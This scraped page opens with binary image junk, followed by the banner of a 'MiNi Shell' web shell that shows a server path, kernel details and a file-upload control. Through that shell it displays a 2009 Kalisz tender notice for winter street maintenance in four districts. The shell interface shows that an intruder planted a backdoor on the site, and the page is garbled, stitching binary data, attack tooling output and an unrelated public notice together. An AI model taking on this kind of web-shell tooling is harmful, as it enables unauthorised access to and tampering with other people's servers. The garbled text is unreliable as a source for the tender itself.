JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090930/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090930/340076-N-2009.html

<p class="kh_header"><b>Kalisz: Zimowe utrzymanie ulic na terenie m. Kalisza w sezonie zimowym 2009/2010 z podziałem na cztery rejony.</b><br>
<b>Numer ogłoszenia: 340076 - 2009; data zamieszczenia: 30.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg  Miejskich , ul. Piskorzewska 17, 62-800 Kalisz, woj. wielkopolskie, tel. 062 5049709, faks 062 5049701.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> zp@zdm.kalisz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zimowe utrzymanie ulic na terenie m. Kalisza w sezonie zimowym 2009/2010 z podziałem na cztery rejony..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zimowe utrzymanie ulic na terenie m. Kalisza w sezonie zimowym 2009/2010 
z podziałem na cztery rejony
4.2.Przedmiot  zamówienia obejmuje :
      4.2.1. zimowe utrzymanie  ulic  na terenie miasta Kalisza na  podstawowym  
               układzie ulic z podziałem na  cztery  rejony.
      Powierzchnia ulic objętych zimowym utrzymaniem na podstawowym 
      układzie ulic - zgodnie  z załącznikiem nr 6  zawierającym  wykaz ulic 
      wynosi:  

Rejon I - ogółem :   194.703 m2 w tym:
            					  I standard   125.006 m2
            					 II standard     69.697 m2 

Rejon II - ogółem:   260.284 m2 w tym:
            					 I  standard    103.724 m2
         					 II standard    156.560 m2

Rejon III  ogółem :   211.685 m2 w tym:
            					 I  standard     165.598 m2
            					II standard        46.087 m2

Rejon IV - ogółem : 295.137m2 w tym:
                                                                  I standard       187.652 m2
                   				II standard      107.485 m2

  4.2.2 Zimowe utrzymanie ulic poza podstawowym układem ulic określonym 
           w punkcie 4.2.1. odbywać się będzie  w sporadycznych przypadkach 
           spowodowanych trudnymi   warunkami stanu  zimowego dróg.

4.3. Opis przedmiotu zamówienia.

1/ przygotowanie materiałów do zwalczania śliskości zimowej wraz z ich zakupem 
    i transportem
2/ przygotowanie sprzętu do odśnieżania i zwalczania śliskości oraz załadunek 
    materiałów
3/ przygotowanie składowisk, pomieszczeń do kierowania akcją i  systemu 
    łączności
4/ odtwarzanie na bieżąco zapasów materiałów pod kątem zabezpieczenia 
    w trakcie trwania sezonu zimowego 2008/2009
5/ przygotowanie i wyposażenie mikrostacji meteorologicznej oraz zapewnienie 
    łączności telefonicznej
6/ kierowanie akcją zimową w zakresie odśnieżania, zwalczanie śliskości zimowej 
    przy pomocy solanki  lub w szczególnych sytuacjach  mieszaniną  soli
    z  piaskiem zgodnie ze standardami zimowego utrzymania dróg.

4.4. Ustalenia dotyczące realizacji zamówienia:

1/  Zimowe utrzymanie ulic realizowane będzie przez Wykonawcę poprzez 
     wyznaczonego z jego strony Dyżurnego.

2/ Zimowe utrzymanie dróg zgodnie z ustalonym zakresem i standardami 
    spoczywa na Wykonawcy i ponosi on  pełną odpowiedzialność.

3/ Decyzje  dotyczące rozpoczęcia  i zakończenia akcji zimowej czynnej 
     podejmuje Dyżurny  wyznaczony ze strony Wykonawcy po uprzednim 
     uzyskaniu zgody Dyżurnego wyznaczonego przez Zamawiającego.
     Odpowiedzialność Wykonawcy o której mowa w pkt-cie 2  nie ma 
     w przypadku zgłoszenia przez Wykonawcę potrzeby podjęcia akcji zimowej 
     i nie uzyskania akceptacji dyżurnego ze strony  Zamawiającego. 

4/ Zwalczanie śliskości  zimowej odbywać się będzie   przez  posypywanie   
    jezdni solą  ze wstępnym zwilżaniem, a także odśnieżaniem przy użyciu 
    pługów odśnieżnych.

5/ W szczególnie uzasadnionych przypadkach kiedy zastosowanie solanki  staje 
    się nieefektywne (np. w temp. otoczenia poniżej -10 C ), Wykonawca może 
    zastosować  mieszaninę piasku  z solą. Zastosowanie mieszaniny piasku 
    z solą wymaga zgody Dyżurnego wyznaczonego przez Zamawiającego.

6/ W dniu podpisania umowy Wykonawca  jest zobowiązany  przedstawić do
   akceptacji  ZDM  sposób  gromadzenia danych  o prowadzeniu akcji  zimowej.

7/ Wykonawca jest zobowiązany do zapewnienia łączności pomiędzy dyżurnym,  
    a jednostkami bezpośrednio uczestniczącymi  w prowadzeniu zimowego 
    utrzymania.

8/ Wykonawca w ramach prowadzonych dyżurów przekazuje codziennie meldunki 
    o przebiegu  Akcji zimowej   wg ustalonego przez Zamawiającego wzoru do 
    godz. 830 w sekretariacie Zarządu Dróg Miejskich  ul. Piskorzewska 17, 62-800 
    Kalisz.
9/ Meldunki za dni wolne od pracy  (soboty, niedziele, święta) należy składać  
    pierwszego dnia roboczego następującego po dniu wolnym w siedzibie ZDM 
    do    godz. 8.30.
      
10/ Prowadzenie dziennika  dyżurów, pracy  sprzętu  i dziennika pogody  oraz 
          zgłaszanych interwencji.

4.5. Wymagania w zakresie realizacji zimowego utrzymania.
Odśnieżanie i zwalczanie  śliskości zimowej dróg  objętych przedmiotem
zamówienia  odbywać się  będzie zgodnie z założonymi standardami :

Opis stanu	Dopuszczalne odstępstwa  od standardu	
Standard	Utrzymania drogi dla danego standardu	Po ustaniu opadów śniegu	Od stwierdzenia występowania zjawisk śliskości   zimowej 
I	jezdnia odśnieżona i posypana na całej długości i szerokości   	Śnieg luźny - do 4 godz.
Błoto pośniegowe - do 6 godz.
Śnieg zajeżdżony - nie dopuszcza się 
Zaspy - nie dopuszcza się 	Gołoledź:- do 3 godz.
Szron:  do 3 godz.
Szadź: do 3 godz.
Śliskość pośniegowa: do 4 godz.
Lodowica: do 4 godz.
II	jezdnia odśnieżona  i posypana na całej długości i szerokości	Śnieg luźny: do 5  godz.
błoto pośniegowe do 7  godz.
Śnieg zajeżdżony,występuje (cienka warstwa nie utrudniająca ruchu)	Gołoledź: do  3 godz.
Szron: do  3 godz.
Szadź: do  3 godz.
Śliskość  pośniegowa do 5  godz.
Lodowica: do  4 godz.

Spodardyczne  przypadki spowodowane trudnymi warunkami zimowymi wymagające rozszerzenia akcji zimowej poza podstawowy zakres, nie będą wymagać uzyskania standardów zimowego utrzymania o których mowa wyżej. Zakres zimowego utrzymania w tych przypadkach ograniczać się będzie do odśnieżania z ewentualnym uszorstnieniem nawierzchni.

4.5.2. Materiały 
    
Materiałami stosowanymi  przy zwalczaniu  śliskości  zimowej są:
-	solanka - roztwór soli z wodą  o stężeniu 20%
-    mieszanina  piasku z solą o stężeniu soli w ilości 10  %.  

Zamawiający dopuszcza użycie mieszanki piasku z solą  w przypadku wystąpienia warunków niekorzystnych (przy tem. Pon. - 10 0C w których użycie solanki staje się nieefektywne.Zastosowanie mieszaniny piasku z solą wymaga zgody dyżurnego ze strony Zamawiającego. 

4.5.3. Sprzęt.

1/ Wykonawca  powinien  mieć  lub dysponować sprzętem  zapewniającym  
     transport  materiałów  i szybkiego odtworzenia  zapasów na składowisku . 
     Sól  powinna być    transportowana  pod plandekami.

2/ Ilość  potrzebnego sprzętu  powinna  zapewnić  utrzymanie ilości m2 dróg  
    (pkt. 2 Instrukcji dla oferentów), zgodnie z  założonymi  standardami . 
    W przypadku  awarii   sprzętu   uniemożliwiającej realizację   usługi  wykonawca  
    zobowiązany jest do   podstawienia sprzętu zastępczego na własny  koszt.

3/ Wykonawca  zobowiązany jest do  posiadania  prawidłowo oznakowanego  
    sprzętu     zapewniającego bezpieczeństwo  innym użytkownikom  drogi i ponosi 
    pełną    odpowiedzialność  za  wszelkie zdarzenia na drodze  wynikające  
    z niewłaściwej   eksploatacji  lub oznakowania  sprzętu.


4/ Sprzęt  do zimowego  utrzymania  Wykonawca wyposaży  w łańcuchy  
    przeciwpoślizgowe, w sytuacjach w których zajdzie konieczność ich 
    zastosowania.

4.5.4. Określenia podstawowe.

1/ Śliskość zimowa - powstaje na skutek tworzenia się na jezdni warstw lodu lub  
    zlodowaciałego śniegu.
2/ Gołoledź - warstwa lodu grubości do 1 mm, powstała na skutek opadu na 
    nawierzchnię  o temperaturze ujemnej mgły roszącej, mżawki lub deszczu.
3/ Lodowica - warstwa kilku milimetrów lodu powstała z zamarznięcia nie usuniętej   
     z nawierzchni wody pochodzącej ze stopienia śniegu lub lodu, bądź  opadu 
     deszczu występującej   gdy po odwilży lub opadzie deszczu przy temperaturze    
     dodatniej  następuje raptowne obniżenie temperatury poniżej 0oC.
4/ Zlodowaciały lub ubity śnieg - warstwa kilku milimetrów do znacznej jej grubości, 
     powstałą przez ubicie i przymarznięcie śniegu do nawierzchni
5/ Standard zimowego utrzymania - opis stanu na jezdni przy różnych 
    zjawiskach atmosferycznych zgodnie z pktem 5.
6/ Zwalczanie śliskości zimowej - posypywanie jezdni środkami chemicznymi i 
    uszorstniającymi.
7/ Rozsypywarka - nośnik sprzętu (samochód ciężarowy) wraz z zespołem do 
    dozowania i rozsypywania  materiałów, montowanych wraz z pojemnikiem na 
    materiał na wspónej ramie.
8/ Składowisko - miejsce  składowania   materiałów do zwalczania śliskości  
    zimowej o odpowiednio przygotowanym podłożu i systemie odwodnienia z 
    możliwością ich zabezpieczenia przed wpływem warunków  atmosferycznych.
9/ Pług  - konstrukcja  składająca się z lemiesza  i zawiesia montowana  na 
     nośniku zgarniająca  śnieg z nawierzchni i usuwającą go poza krawędź jezdni.
10/ Pług lekki - montowany na ciągnikach rolniczych i samochodach o ładowności 
      ok. 6 t i napędzie na jedną oś - największa grubość odśnieżania do 20 cm.
11/ Pług średni - montowany na samochodach o ładowności  powyżej 6 t i 
       napędzie na 1 lub 2 osie - grubość warstwy odśnieżania do 30 cm.
12/ Solanka - roztwór soli z wodą o stężeniu  20 %.
13/ Dyżurny -
      -  dyżurny ze strony Wykonawcy:  osoba wyznaczona ze strony Wykonawcy do 
         kierowania i kontroli  przebiegu  akcji zimowej zgodnie z zakresem 
          określonym w punkcie 4.
      -  dyżurny ze stony Zamawiającego:  osoba wyznaczona przez Zamawiającego 
         uprawniona do podejmowania decyzji o prowadzeniu akcji zimowej czynnej 
         oraz decyzji do  rozpoczęcia i zakończenia  akcji zimowej po otrzymaniu 
         zgłoszenia dyżurnego ze strony Wykonawcy a także  nadzorująca cały 
         przebieg  akcji zimowej. 

4.5.5.	Zaleca się, aby Wykonawca dokonał wizji lokalnej na terenie objętym przedmiotem zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> REJON I 	-  5 tys. zł
REJON II 	-  7 tys. zł
REJON III -  4 tys. zł
REJON IV -  6 tys. zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 9.	Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków.
9.1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
9.1.1.	posiadają uprawnienia do wykonywania określonej działalności lub czynności będącej przedmiotem zamówienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
9.1.2.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innego podmiotu do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia tj.:

1/ Posiadają lub mają zapewniony dostęp ( udokumentowany  umową  najmu , 
    dzierżawy,  użyczenia itp. ) do niżej  podanych w pełni sprawnych jednostek  
    sprzętu  niezbędnego do   wykonania  przedmiotu zamówienia j.n.:

Minimalny potencjał techniczny do obsługi jednego rejonu :

a)	solarki 1 szt.
b)	pługi lekkie 2 szt.
c)	pługi średnie 1 szt.
d)	piaskarka lub ciągnik  z rozrzutnikiem  1 szt.
e)	urządzenie do wytwarzania solanki 
wraz ze zbiornikami  magazynowymi 1 szt. 




Minimalny potencjał techniczny do obsługi dwóch rejonów :

a)	solarki 2 szt.
b)	pługi lekkie 3 szt.
c)	pługi średnie 2 szt
d)	piaskarka lub ciągnik  z rozrzutnikiem  1 szt.
e)	urządzenie do wytwarzania solanki 
wraz ze zbiornikami  magazynowymi 1 szt. 

Minimalny potencjał techniczny do obsługi trzech rejonów :

a)	solarki 3 szt.
b)	pługi lekkie 5 szt.
c)	pługi średnie 3 szt
d)	piaskarka lub ciągnik  z rozrzutnikiem  1 szt.
e)	urządzenie do wytwarzania solanki 
wraz ze zbiornikami  magazynowymi 1 szt. 

Minimalny potencjał techniczny do obsługi czterech rejonów :

a)	solarki 4 szt.
b)	pługi lekkie 6 szt.
c)	pługi średnie 4 szt.
d)	piaskarka lub ciągnik  z rozrzutnikiem  1 szt.
e)	urządzenie do wytwarzania solanki 
wraz ze zbiornikami  magazynowymi 1 szt. 

2/  Posiadają  składowisko  materiałów oraz urządzenia do  wytwarzania solanki.

W przypadku prowadzenia zimowego utrzymania w więcej niż 1 rejonie wystarczy  
1 składowisko i 1 urządzenie do wytwarzania solanki.

3/ złożą pisemne zobowiązanie innych podmiotów do udostępnienia potencjału
    technicznego w przypadku, gdy Wykonawca  nie dysponuje odpowiednim  potencjałem
    technicznym do wykonania zamówienia o którym mowa w 8.1.2. ppkt. 1/.

4/  wykażą należyte wykonanie w ciągu ostatnich 3 lat przed dniem wszczęcia     
     niniejszego postępowania, a jeżeli okres prowadzenia działalności jest krótszy
     - w tym okresie tj.: kierowali i prowadzili  przynajmniej jeden raz  zimowe
     utrzymanie   w zakresie uszarstniania i odśnieżania  na  drogach 
     publicznych. 
     Warunek powyższy nie oznacza prowadzenia i kierowania zimowym 
     utrzymaniem dróg w okresie całego sezonu zimowego, może to być  
     miesiąc, tysień, 1 dzień.

5/ zaakceptują termin realizacji zamówienia: od 01.11.2009 r. do 31.03.2010r. 

6/ zaakceptują  możliwość wcześniejszego rozpoczęcia a także  wydłużenia  czasu 
    prowadzenia zimowego utrzymania ulic  A/z w przypadku  wystapienia 
    niekorzystnych warunków atmosferycznych.
7/  Zaakceptują 21 dniowy  termin  płatności faktur

9.1.3.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, tj:,
    wykażą, że posiadają (aktualne przynajmniej na dzień składania ofert) 
    ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej 
    działalności gospodarczej.

9.1.4.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 ustawy,
9.1.5.	zaakceptują termin realizacji określony w pkt. 5 SIWZ,
9.1.6.zaakceptują  21  dniowy termin płatności faktur

9.2. Ocena spełniania warunków udziału w postępowaniu przez wykonawców,    określonych w pkt. 9.1 SIWZ, będzie dokonana w oparciu o kompletność 
i prawidłowość złożonych wraz z ofertą oświadczeń i dokumentów, jakich żąda  Zamawiający i zostanie dokonana na podstawie treści tych dokumentów według formuły  spełnia/nie spełnia
9.3. Każdy z Wykonawców ubiegający się wspólnie o udzielenie zamówienia       (składający ofertę wspólnie) musi samodzielnie spełniać warunki, o których mowa w pkt. 9.1.1. oraz pkt. 9.1.4. SIWZ. 
         Pozostałe warunki i wymagania zawarte w pkt. 9.1. mogą zostać spełnione          łącznie przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 10.	Wykaz oświadczeń lub dokumentów, jakie mają dostarczyć Wykonawcy     w celu potwierdzenia spełnienia warunków udziału  w postępowaniu.
Wraz z ofertą Wykonawca zobowiązany jest do złożenia n/w dokumentów: 
10.1.	oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu - wzór stanowi załącznik do SIWZ,
10.2.	aktualny odpis z właściwego rejestru lub aktualne zaświadczenie o wpisie       do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert*,
10.3.	dowód wniesienia wadium,
10.4.	aktualną informację z Krajowego Rejestru Karnego w zakresie określonym             w art. 24 ust. 1 pkt. 4 - 8  ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert*,
10.5.	aktualną informację z Krajowego Rejestru Karnego w zakresie określonym       w art. 24 ust. 1 pkt. 9 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert*,
10.6.	aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub kasy Rolniczego   Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie  zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń , że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert*,
10.7.	wykaz potencjału technicznego niezbędnego dla realizacji zamówienia określonego w pkt-cie 8.1.2 ppkt.1/
10.8.	złożenie  pisemnego  zobowiązania innych podmiotów do udostępnienia potencjału technicznego w przypadku, gdy Wykonawca  nie dysponuje odpowiednim  potencjałem  technicznym do wykonania zamówienia o którym mowa w 8.1.2. ppkt. 1/.
10.9.	wykaz usług spełniających warunek określony w pkt. 8.1.2. ppkt. 4/ - wzór wykazu stanowi załącznik do SIWZ (Potencjał Techniczny).
10.10.	Dokumenty potwierdzające, że wykonane usługi wyszczególnione 
w wykazie, o którym mowa w pkt. 9.9. zostały wykonane należycie. Wykonane usługi wymienione w wykazie, o którym mowa w pkt. 9.9. a nie potwierdzone ww. dokumentami nie będą uwzględniane przy ocenie ofert. 
W przypadku wspólnego ubiegania się o niniejsze zamówienie przez dwóch lub więcej Wykonawców, każdy z tych Wykonawców dołącza do oferty ww. dokumenty oznaczone gwiazdką (*) dotyczące każdego z nich.
Z treści ww. dokumentów musi jednoznacznie wynikać, że Wykonawca spełnia warunki udziału w postępowaniu, o których mowa w pkt. 8 SIWZ.


Dokumenty, o których mowa w pkt. 10.2, 10.4, 10.5, 10.6, 10.7, 10.9,  mogą być przedstawione w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę (osobę/y uprawnioną/e do reprezentowania Wykonawcy), pozostałe dokumenty należy złożyć w oryginale.
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, do składania dokumentów, o których mowa wyżej stosuje się odpowiednio przepisy zawarte w § 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 roku w sprawie rodzajów dokumentów potwierdzających spełnianie warunków udziału w postępowaniu o udzielenie zamówienia publicznego, jakich może żądać zamawiający od Wykonawcy (Dz. U. z 2006r. Nr 87 poz. 605z późn. zm.)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zdm.kalisz.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Miejskich ul. Piskorzewska 17, 62-800 Kalisz.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.10.2009 godzina 12:00, miejsce: Zarząd Dróg Miejskich ul. Piskorzewska 17, 62-800 Kalisz.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 5.	Termin realizacji zamówienia : od  01 listopada 2009 do 31.03.2010r. 

Zamawiający zastrzega sobie prawo   wcześniejszego rozpoczęcia a także  późniejszego zakończenia  prowadzenia zimowego utrzymania ulic  A/z 
w przypadku  wystapienia    niekorzystnych warunków atmosferycznych.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zimowe utrzymanie ulic na terenie m. Kalisza w sezonie zimowym 2009/2010 z podziałem na cztery rejony.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rejon I - ogółem :   194.703 m2 w tym:
            					  I standard   125.006 m2
              				 II standard     69.697 m2.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zimowe utrzymanie ulic na terenie m. Kalisza w sezonie zimowym 2009/2010 z podziałem na cztery rejony..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rejon II - ogółem:   260.284 m2 w tym:
            					 I  standard    103.724 m2
         					 II standard    156.560 m2.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zimowe utrzymanie ulic na terenie m. Kalisza w sezonie zimowym 2009/2010 z podziałem na cztery rejony..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rejon III  ogółem :   211.685 m2 w tym:
            					 I  standard     165.598 m2
                					II standard        46.087 m2.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zimowe utrzymanie ulic na terenie m. Kalisza w sezonie zimowym 2009/2010 z podziałem na cztery rejony..</p>
